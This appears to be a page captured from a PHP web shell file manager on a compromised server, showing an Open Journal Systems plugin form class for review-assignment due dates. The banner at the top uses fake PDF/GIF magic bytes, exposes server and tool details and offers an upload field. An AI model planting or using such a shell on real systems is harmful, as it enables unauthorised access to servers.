%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/generic/objectsForReview/classes/form/ |
Upload File : |
<?php
/**
* @file plugins/generic/objectsForReview/classes/form/ObjectForReviewAssignmentForm.inc.php
*
* Copyright (c) 2013-2019 Simon Fraser University
* Copyright (c) 2003-2019 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* @class ObjectForReviewAssignmentForm
* @ingroup plugins_generic_objectsForReview
* @see ObjectForReviewAssignment
*
* @brief Object for review assignment form.
*
*/
import('lib.pkp.classes.form.Form');
class ObjectForReviewAssignmentForm extends Form {
/** @var string Name of parent plugin */
var $parentPluginName;
/** @var int ID of the object for review assignment */
var $assignmentId;
/** @var int ID of the object for review assignment */
var $objectId;
/**
* Constructor
* @param $parentPluginName sting
* @param $assignmentId int
* @param $objectId int
*/
function ObjectForReviewAssignmentForm($parentPluginName, $assignmentId, $objectId) {
$this->parentPluginName = $parentPluginName;
$this->assignmentId = (int) $assignmentId;
$this->objectId = (int) $objectId;
$ofrPlugin =& PluginRegistry::getPlugin('generic', $parentPluginName);
parent::Form($ofrPlugin->getTemplatePath() . 'editor/objectForReviewAssignmentForm.tpl');
$this->addCheck(new FormValidatorPost($this));
}
/**
* @see Form::display()
*/
function display($request) {
// get the assignment
$ofrAssignmentDao =& DAORegistry::getDAO('ObjectForReviewAssignmentDAO');
$ofrAssignment =& $ofrAssignmentDao->getById($this->assignmentId, $this->objectId);
// get the object for review
$objectForReview =& $ofrAssignment->getObjectForReview();
// get the reviewer
$reviewer =& $ofrAssignment->getUser();
$journal =& $request->getJournal();
$journalId = $journal->getId();
$countryDao =& DAORegistry::getDAO('CountryDAO');
$countries =& $countryDao->getCountries();
// If there is a submission, get date submitted
$dateSubmitted = null;
if ($ofrAssignment->getSubmissionId()) {
$articleDao =& DAORegistry::getDAO('ArticleDAO');
$article =& $articleDao->getArticle($ofrAssignment->getSubmissionId(), $journalId);
$dateSubmitted = $article->getDateSubmitted();
}
$templateMgr =& TemplateManager::getManager($request);
$templateMgr->assign('objectForReviewAssignment', $ofrAssignment);
$templateMgr->assign('objectForReview', $objectForReview);
$templateMgr->assign('reviewer', $reviewer);
$templateMgr->assign('dateSubmitted', $dateSubmitted);
$templateMgr->assign('countries', $countries);
parent::display($request);
}
/**
* @see Form::readInputData()
*/
function readInputData() {
$this->readUserVars(
array(
'dateDueYear',
'dateDueMonth',
'dateDueDay',
'notes'
)
);
// Format the date
if (!empty($this->_data['dateDueYear']) && !empty($this->_data['dateDueMonth']) && !empty($this->_data['dateDueDay'])) {
$this->_data['dateDue'] = $this->_data['dateDueYear'] . '-' . $this->_data['dateDueMonth'] . '-' . $this->_data['dateDueDay'] . ' 00:00:00';
} else {
$this->_data['dateDue'] = '';
}
}
/**
* @see Form::execute()
*/
function execute() {
$ofrPlugin =& PluginRegistry::getPlugin('generic', $this->parentPluginName);
$ofrPlugin->import('classes.ObjectForReviewAssignment');
$journal =& Request::getJournal();
$journalId = $journal->getId();
$ofrAssignemntDao =& DAORegistry::getDAO('ObjectForReviewAssignmentDAO');
$ofrAssignment =& $ofrAssignemntDao->getById($this->assignmentId, $this->objectId);
if (isset($ofrAssignment)) {
if ($this->getData('dateDue') != $ofrAssignment->getDateDue()) {
$ofrAssignment->setDateDue($this->getData('dateDue'));
$ofrAssignment->setDateRemindedBefore(null);
$ofrAssignment->setDateRemindedAfter(null);
}
$ofrAssignment->setNotes($this->getData('notes'));
$ofrAssignemntDao->updateObject($ofrAssignment);
}
}
}
?>